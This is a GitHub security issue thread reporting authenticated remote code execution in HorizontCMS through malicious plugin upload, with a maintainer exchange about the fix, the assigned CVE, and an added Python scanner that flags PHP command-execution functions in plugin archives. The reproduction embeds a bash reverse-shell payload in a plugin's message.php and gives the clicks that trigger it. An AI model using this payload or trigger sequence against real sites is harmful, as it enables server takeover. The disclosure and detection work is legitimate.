Open bigb0sss opened 3 years ago
Hi @ttimot24,
Hope all is well. Thank you for labeling the issues as security. We are wondering if you are planning to remediate the issues any time soon. If not, would it be okay for us to write a short blog about our findings on the HorizontCMS? Thanks.
Hi @bigb0sss,
I'm planning to fix this security issue. My schedule is a bit busy, so I think it will be fixed in April.
Feel free to write about it on your blog.
Hi @ttimot24,
Hope all is well.
We know you are still busy, but we just wanted to follow up again to see if the issues have been fixed?
If so, would you please point us to the updated code?
Please let us know if you have any questions. Thanks!
Hi @ttimot24,
Hope all is well. CVE-2021-28428 (https://www.cve.org/CVERecord?id=CVE-2021-28428) was assigned for this issue. Thanks again for the prompt fix for the vulnerability.
All the best,
Description of the Issue
One who is able to log into the admin panel can gain Remote Code Execution by uploading a malicious Plugin file via the Plugins upload functionality.
Reproduction of the Issue
$shell = exec("/bin/bash -c 'bash -i >& /dev/tcp//9001 0>&1'");
return [
    'successfully_added_location' => $shell, //'Location added succesfully!',
    'successfully_deleted_location' => 'Location deleted succesfully!',
    'successfully_set_center' => 'Location is successfully set as map center!'
];
Install --> Activate --> Google Maps Plugin is created in the menu bar:
Add location --> Click Save (to initiate the message.php code)
Listener Receiving a Reverse Shell
Root Cause
Please let us know if you have any questions or need further information. Thanks.
Daniel Min & Chi Tran
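For reviewing plugin archives before installation, the following is an added example (not part of the original report and not HorizontCMS code) that flags calls to PHP command-execution functions, such as the `exec()` call in the language file above. The archive paths, function names and sample contents are constructed for illustration, and the regex pass is a triage aid that does not handle heredocs or backtick execution.

```python
import io
import re
import zipfile

# PHP functions that run OS commands; the report's payload uses exec().
CMD_FUNCS = ("exec", "shell_exec", "system", "passthru", "popen", "proc_open")
# Skip variables ($exec), methods (->exec, ::exec) and longer names (myexec).
CALL_RE = re.compile(r"(?<![\w$>:])(" + "|".join(CMD_FUNCS) + r")\s*\(", re.I)
# Comments and quoted strings are blanked first so that text such as
# 'exec(' inside a message string or a comment is not reported.
NOISE_RE = re.compile(
    r"/\*.*?\*/|//[^\n]*|#[^\n]*|'(?:\\.|[^'\\])*'|" r'"(?:\\.|[^"\\])*"',
    re.S,
)


def scan_plugin_zip(data: bytes) -> list:
    """Return (file, line, function) for each command-execution call found."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".php"):
                continue
            src = zf.read(name).decode("utf-8", "replace")
            # Keep newlines while blanking so reported line numbers stay correct.
            code = NOISE_RE.sub(lambda m: "\n" * m.group().count("\n"), src)
            for lineno, line in enumerate(code.splitlines(), 1):
                for m in CALL_RE.finditer(line):
                    findings.append((name, lineno, m.group(1).lower()))
    return findings


def _sample_zip() -> bytes:
    """Constructed archive: one clean language file, one that calls exec()."""
    benign = "<?php\n// exec( in a comment\nreturn ['note' => 'call exec() never'];\n"
    flagged = '<?php\n$out = exec("id");\nreturn [\'successfully_added_location\' => $out];\n'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("demo/lang/en/ok.php", benign)
        zf.writestr("demo/lang/en/message.php", flagged)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_plugin_zip(_sample_zip()):
        print("%s:%d calls %s()" % finding)
```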